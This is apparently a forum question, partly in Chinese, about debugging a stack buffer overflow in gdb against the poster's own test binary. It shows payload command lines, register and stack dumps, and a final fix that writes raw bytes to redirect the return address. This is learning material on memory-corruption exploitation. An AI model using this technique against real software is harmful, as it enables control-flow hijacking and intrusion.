我运行 test i gdb 来利用缓冲区溢出,测试时使用:
(gdb) r $(python3 -c 'print(b"\x41"*152+"\x42"*6 )')
(gdb) i r
...
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe420 0x7fffffffe420
rip 0x424242424242 0x424242424242
...
我得到了 BBBBBB 但是当使用地址进行测试时:
r $(python3 -c 'print(b"\x41"*152+b"\x70\xe3\xff\xff\xff\x7f")')
(gdb) i r
...
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe3f8 0x7fffffffe3f8
rip 0x400694 0x400694 <main+171>
...
我得到了 0x400694 0x400694
我尝试过不同的地址和格式,但得到相同的答案。
****更新 这里有一些额外的说明:
for the test1 with: r $(python3 -c 'print("\x41"*152+"\x42"*6 )')
Vulnearble call @ 0x0000000000400667 <+126>: callq 0x400460 strcpy@plt
Dump of assembler code for function main:
0x0000000000400667 <+126>: callq 0x400460 strcpy@plt
0x000000000040066c <+131>: lea -0x90(%rbp),%rdx
0x0000000000400673 <+138>: lea -0x90(%rbp),%rax
0x000000000040067a <+145>: mov %rax,%rsi
0x000000000040067d <+148>: lea 0x134(%rip),%rdi # 0x4007b8
0x0000000000400684 <+155>: mov $0x0,%eax
0x0000000000400689 <+160>: callq 0x400480 printf@plt
0x000000000040068e <+165>: mov $0x0,%eax
0x0000000000400693 <+170>: leaveq
0x0000000000400694 <+171>: retq
The break is @ 0x0000000000400694 <+171>: retq i follow with 'next'
(gdb) next
(gdb) x/256xb $rsp-192
0x7fffffffe370: 0x02 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe378: 0x8e 0x06 0x40 0x00 0x00 0x00 0x00 0x00
0x7fffffffe380: 0x08 0xe5 0xff 0xff 0xff 0x7f 0x00 0x00
0x7fffffffe388: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00
0x7fffffffe390: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe398: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3a0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3a8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3b0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3b8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3c0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3c8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3d0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3d8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3e0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3e8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3f0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3f8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe400: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe408: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe410: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe418: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe420: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe428: 0x42 0x42 0x42 0x42 0x42 0x42 0x00 0x00
0x7fffffffe430: 0x02 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe438: 0x08 0xe5 0xff 0xff 0xff 0x7f 0x00 0x00
0x7fffffffe440: 0x00 0x80 0x00 0x00 0x02 0x00 0x00 0x00
0x7fffffffe448: 0xe9 0x05 0x40 0x00 0x00 0x00 0x00 0x00
0x7fffffffe450: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe458: 0x8e 0x14 0xd9 0x63 0x32 0x13 0xbd 0x9e
0x7fffffffe460: 0x90 0x04 0x40 0x00 0x00 0x00 0x00 0x00
0x7fffffffe468: 0x00 0xe5 0xff 0xff 0xff 0x7f 0x00 0x00
(gdb) i r
rax 0x0 0
rbx 0x0 0
rcx 0x0 0
rdx 0x0 0
rsi 0x602260 6300256
rdi 0x1 1
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe430 0x7fffffffe430
r8 0x0 0
r9 0x0 0
r10 0x0 0
r11 0x246 582
r12 0x400490 4195472
r13 0x7fffffffe500 140737488348416
r14 0x0 0
r15 0x0 0
rip 0x424242424242 0x424242424242
eflags 0x206 [ PF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
for the test2 with: r $(python3 -c 'print("\x41"*152+"\x70\xe3\xff\xff\xff\x7f")')
The break is still @ 0x0000000000400694 <+171>: retq i follow with 'next'
(gdb) next
(gdb) x/256xb $rsp-192
0x7fffffffe370: 0x02 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe378: 0x8e 0x06 0x40 0x00 0x00 0x00 0x00 0x00
0x7fffffffe380: 0x08 0xe5 0xff 0xff 0xff 0x7f 0x00 0x00
0x7fffffffe388: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00
0x7fffffffe390: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe398: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3a0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3a8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3b0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3b8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3c0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3c8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3d0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3d8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3e0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3e8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3f0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3f8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe400: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe408: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe410: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe418: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe420: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe428: 0x70 0xc3 0xa3 0xc3 0xbf 0xc3 0xbf 0xc3
0x7fffffffe430: 0xbf 0x7f 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe438: 0x08 0xe5 0xff 0xff 0xff 0x7f 0x00 0x00
0x7fffffffe440: 0x00 0x80 0x00 0x00 0x02 0x00 0x00 0x00
0x7fffffffe448: 0xe9 0x05 0x40 0x00 0x00 0x00 0x00 0x00
0x7fffffffe450: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe458: 0xb0 0x0b 0xe6 0x1e 0x6c 0x33 0x69 0x0a
0x7fffffffe460: 0x90 0x04 0x40 0x00 0x00 0x00 0x00 0x00
(gdb) i r
rax 0x0 0
rbx 0x0 0
rcx 0x0 0
rdx 0x0 0
rsi 0x602260 6300256
rdi 0x1 1
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe428 0x7fffffffe428
r8 0x0 0
r9 0x0 0
r10 0x0 0
r11 0x246 582
r12 0x400490 4195472
r13 0x7fffffffe500 140737488348416
r14 0x0 0
r15 0x0 0
rip 0x400694 0x400694 <main+171>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
最后,感谢 @Jester 编码解决了问题。
(gdb) r $(python3 -c 'import sys; sys.stdout.buffer.write(b"\x41"*152 + b"\x70\xe3\xff\xff\xff\x7f")')
解决了问题。
与上面的步骤相同
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe370 in ?? ()